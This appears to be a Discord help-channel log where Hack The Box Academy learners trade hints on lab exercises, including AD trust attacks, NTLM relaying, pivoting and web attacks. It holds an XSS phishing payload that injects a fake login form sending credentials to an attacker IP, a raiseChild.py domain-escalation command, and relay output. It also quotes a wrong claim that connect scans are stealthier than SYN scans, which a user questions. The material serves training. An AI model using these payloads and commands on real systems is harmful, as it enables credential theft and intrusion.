https://bond-o.medium.com/extracting-and-cracking-ntds-dit-2b266214f277

generally HTB will show the simpler way

but if you wanna go through the effort of doing it this way; be my guest

it took 5 seconds to google and find an answer

short answer; yes it's likely intentional

considering they give you the cme command that makes it easier

if you want them to add it, submit to #1234357888114364508

I know it's scheduled maintenance but it still makes me sad. I was in mid command execution and the VM is down now

i'm not aware of any sched maintenance

usually it's at the bulletin at the top

the pwnbox do have lifetimes

Ongoing US maintenance rn

min 2 hours from you turning it on

this is why I use my own vm ¯_(ツ)_/¯

don't gotta worry about maintenance unless I fuck up ™️

Nah the target machine pooped the bed

Had to switch to the dirty dirty EU

then don't describe it as a vm, describe it as the target

So on all those machines that get stuck on a black screen with xfreerdp (but not Remmina), apparently pressing Enter once fix the problem, indeed, thanks

vm implies it's the machine you're using

yeah, it's failing to draw the corporate AUP screen

DonT dEscRibE it As a vM 🤓

Sir this is wendys

just saying; when you say "VM" it implies something different

I and many others will read it as "The VM i am using/pwnbox"

not the target machine

The target machine is in fact a VM

it is, but that doesn't mean people don't have preconceived ideas of what VM means in relation to academy

"VM is down oh no" --> many people assume you mean the pwnbox

Target is down --> ah, skill issue

it's not about being "technically correct" it's about what words people use to describe the environments

😐

Go off king

also some of the targets are docker containers

just trying to help you for future, that way people don't get confused when trying to help you

can someone give me a little nudge for Skills Assessment - File Upload Attacks

You need to specifiy which VM, (target or attack) you mean. If you don't, then don't ask a question. It's confusing asf

not me trying to go through those messeges to find my question, im cooked

HTTP ATTACKS - TE.CL

Getting a request timeout from the target even though I used the payload shown in the solutions. Anybody able to help with this?

Check your network connection

can anyone help me out with this part really confused here

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Module: AD Enumeration & Attacks
Section: Attacking Domain Trusts - Child -> Parent Trusts - from Linux
https://academy.hackthebox.com/module/143/section/1508

I need a nudge on the end of section question. I've logged onto the attack host, ACADEMY-EA-ATTACK01. I can see there's another machine ACADEMY-EA-DC02, which seems to be a DC. It seems to be the parent DC? (I'm unsure)

INFORMATION GATHERING - WEB EDITION
Skills Assessment
What is the API key in the hidden admin directory that you have discovered on the target system?

i tried to bruteforce with ffuf, dns enum and gobuster - but i haven't found a hidden directory. any hint?

check the domain name and it should be pretty obvious

The domain name? I tried performing an Nmap scan of ACADEMY-EA-DC02 and it returned the domain ||INLANEFREIGHT.LOCAL|| as part of the report. But that seems to be the parent DC. I was assuming that with this question, we'd be starting off having compromised the child domain?

did you spawn the target for that section

Yes, it's spawned two machines, the ones I listed in my initial question.

right then you should find the child domain to begin the attack

DM!

just checked, DC02 is the child domain DC, you might want to check the output again

You're right. I just did a script scan and it showed the FQDN.

So I need to compromise the child domain first before I can perform the ExtraSids attack?

netexec will output the domain name rightaway btw

you already have the DA creds, it's the same as the previous section

Has that tool been covered in the module? I don't think so, right?

Oh okay, great, thanks.

pretty sure I've mentioned it a few times before, it's just cme but updated

Should I just replace cme with netexec then?

I ran this command which gave me a shell:
||```powershell
raiseChild.py -target-exec 10.129.73.221 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

However, the shell seems to be for the DC02? Not the parent's DC? I thought this command was supposed to autopwn and provide shell access to the parent DC?

your target needs to be the parent dc

I'd suggest to check the section again on both the manual and automated methods to understand what they're doing

yes

Alrighty

hey, I'm new to htb academy. if i hover over this highlighted text will it show some info about it in a small box kind of? its mentioned that it will show some info in this section but if i hover over the highlighted text in yellow it nothing is showing up. I mean , am i missing something or it is just a highlighted text?

Hi, is it possible to see on a website which usings a ai tool in the background, to see the prompt and so on?

Hi,
Module: Information Gathering - Web Edition
Section: Skill Assessment
Question: "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb."
I'm using ffuf and zaproxy and I was fuzzing http://inlanefreight.htb:port/FUZZ url with these seclist wordlist: common.txt, big.txt, directory-list-2.3-medium.txt but with no luck. I did the same for subdomain and hidden admin directory.
What am I missing? 😄 Can someone share a hint?

you can see it in the "Which" paragraph if you scroll up a bit

yeah, now i have some idea of how it works. Thank you.

DM!

<@&861185840277487616> at this point I swear they're a bot

Thanks, I'll keep an eye on that

They do the same in the parrot discord but haven't said anything

Thanks for help 🙂

hey, having issues submitting commands on mysql. screenshot attached, looks correct from my previous notes. any ideas?

like it's not coming back as an error, just to a new line. I remember mysql being awkward

lol never mind. exited mysql and logged back in and it's working fine now

SQL INJECTION FUNDAMENTALS
Intro to MySQL

Why cant i connect to the sql server??

mysql -u root -h Target_ip -P Target_port -p
bash: mysql: command not found

@gusty patio Install mysql

even on the machine?

@gusty patio On you attacking machine

shouldnt the pwnbox have it pre installed? I can see a file named mysql_config but thats about all

#710108839063846964 message

did the upate break it

i can connect thanks for the help

Hi, do I need to perform OSINT: Corporate Recon in order to take the Penetration Testing Certification exam?

Is it part of the penetration path?

Have you finished the skill assessment?

On the exam page, OSINT isn't mentioned, but it does appear under the job role of a Penetration Tester.

Is it part of the job roll path to complete as a requirement of the exam?

On the exam page, the module isn't mentioned, but it states that I need to follow the Penetration Tester path, and on the Penetration Tester page, OSINT is listed.

you don't need to finish the OSINT module, a little bit of osint is mentioned here and there throughout the course(like in the information gathering module)

https://academy.hackthebox.com/paths/jobrole
where do you see the osint module listed under the Penetration Tester path?

https://academy.hackthebox.com/module/90/section/1559

Hi guys

I am writing for XSS phishing on HTB

My payload is this but when I want to send it via send.php, it says "issue with the URL"
What can I do now?

http://SERVER-IP/phishing/index.php?url='><script>document.write('<h3>Please+login+to+continue<%2Fh3><form+action%3Dhttp%3A%2F%2FMY-IP%3A8000><input+type%3D"username"+name%3D"username"+placeholder%3D"Username"><input+type%3D"password"+name%3D"password"+placeholder%3D"Password"><input+type%3D"submit"+name%3D"submit"+value%3D"Login"><%2Fform>')%3Bdocument.getElementById('urlform').remove()%3B<%2Fscript><!--

Note: I remove server and client IPs

did they say you need those modules for cpts?

https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist/certification-steps

No, my bad, thx for the help.

you'll just need to complete the Penetration Tester job-role path

Wrap your code in triple back ticks,,

```
<Code goes here />
```

<Code goes here />

It's easier to read and prevents formatting clobber.

https://academy.hackthebox.com/module/84/section/1747

Using CrackMapExec - Skill Assesment

I have used ||drop-sc|| and have ||ntlmrelay|| on but it does not output any hashes

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.129.204.182, attacking target smb://172.16.15.15
[*] Authenticating against smb://172.16.15.15 as INLANEFREIGHT/JAMES SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Received connection from 10.129.204.182, attacking target smb://172.16.15.20
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Authenticating against smb://172.16.15.20 as INLANEFREIGHT/JAMES SUCCEED

ntlmrelayx does relaying as the name suggests, there's another tool that can capture the hash instead

Thanks I will use that got confused from the module instructions

As for other who checks later:
Yes it worked and no need for proxychains

its not the network connection...

hi, anybody completed the HTTP Misconfiguration Skill Assessment - Hard? can i get a nudge?

hello how do i get permission to talk in general channel and pwnbox?

Read and follow #welcome

Connect Scan
The Nmap TCP Connect Scan (-sT) uses the TCP three-way handshake to determine if a specific port on a target host is open or closed. The scan sends an SYN packet to the target port and waits for a response. It is considered open if the target port responds with an SYN-ACK packet and closed if it responds with an RST packet.

The Connect scan is useful because it is the most accurate way to determine the state of a port, and it is also the most stealthy. Unlike other types of scans, such as the SYN scan, the Connect scan does not leave any unfinished connections or unsent packets on the target host, which makes it less likely to be detected by intrusion detection systems (IDS) or intrusion prevention systems (IPS). It is useful when we want to map the network and don't want to disturb the services running behind it, thus causing a minimal impact and sometimes considered a more polite scan method.

it says TCP scan is more stealthy compared to SYN scan. Isnt this wrong? I thought TCP scan is more likely to get detected since it completes the threeway handshake. I googled online and most ppl says the same as me. am I misunderstanding some here?

amazing module. shout out to 21y4d for the awesome content

so burpsuite is just not reaching the box on the Exam now for me, I have pinged it nmapped it, gone to it on my own browser. Any ideas?

i had issues reaching some targets using the US vpn pack recently. not sure if it's possible on the exam, but if you can it might worth regenerating your ovpn file in the eu region instead

Appreciate it, downloaded a new vpn file but didn't think about that

Yeah still not working lol

new to cyber security
feeling lost... don't where to start

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

restart your box and if it still fails reach out to support

games would be ctfs. platform hackthebox. hope this helped

I doubt it's a problem with the exam env, if they can reach the web server then the env is good

probably something with burp

Hi there, is anyone having issues with the PASSWORD ATTACKS windows machines? it keeps in Target(s) are spawning forever 😦

https://app.hackthebox.com/home or https://tryhackme.com/r/hacktivities/practice

xsltproc, rename the target using mv target target.xml then run the command and drag the xml into firefox. just putting this here

Hey guys, Im having a little bit of a hard time understanding what chisel and proxychains is used for. Its in the Pass the ticket LINUX Section of the PASSWORD attacks Module, (Using Linux Attack Tools with Kerberos). Thanks in advance for any help

Hello people, I need help with hacking an Instagram account which is trying to impersonate my friend. Need to hack his I'd and delete my photos

no

you can use them to access hosts that are in another network that you have no access to

also no

hey guys, I'm trying to perform an Nmap scan on a target IP, but I'm encountering issues. When I run sudo nmap -sV IP, it shows the host is down. Using -Pn shows the host is up, but all ports are filtered. Scanning port 80 with sudo nmap -sV -Pn -p 80 IP shows it as filtered without displaying the service version. My local firewall (ufw) is inactive, how can i solve this?

why do i always see someone in here with google or instagram hacking stuff. i don't know jack bout that

Because people just look up "hacking" in server discovery

is this in the nmap section? i am on service enumeration right now

Yes, although in the module, they use proxychains AND chiesel, but never showed why we used proxychains...

makes sense

proxychains is used to tunnle traffic through chiesel

So, from my attacking machine: I configured proxychains as socks5 localhost and port 1080. Then set up a chisel reverse server and connect back from the jump host. So now, should I be able to access the linux machine? (which is part of the network of MS01/jumphost). And also, from which part /how does chisel uses proxychain in that scenario?

im not impressive enough to do instagram hacking stuff, i just look at splunk and mft and $j

yes it's in the nmap section, i had some issues dealing with this. i already uses the htb vpn but the result still filtered and the scan time took so long

which sub module

Here is how I see it, but I dont understand how proxychain is used by chisel

Pentesting Basics : Service Scanning

chisel creates the socks tunnel, proxychains gets whatever program that you're running to use that tunnel

they will explain more in the Pivoting, Tunneling, and Port Forwarding module

can you link that, i can't find it

Okay thanks... cus in this module im kinda confused they just put you on the spot

https://academy.hackthebox.com/module/77/section/726

Ohhh I see now! So basically proxychains uses the chisel tunnel, so it can access hosts in another network ex:

Well don't worry about hacking ig accounts because it's illegal lol

ah ok, i skipped that to get to Nmap (next module), i need to go back, i thought it was going to be pretty short

Pentesting basics isn't a module btw

You generally shouldn't skip modules in the path

marcielee hacks ig accounts

when she's bored

I hack into your mother's room

That's unfortunate

ohh sorry, i didn't know it wasn't a module

It's called getting started

Marcielee the type of person to simswap her exes

huh?

huh?

btw do you guys know how to solve the issues?

The module name is "Getting Started" btw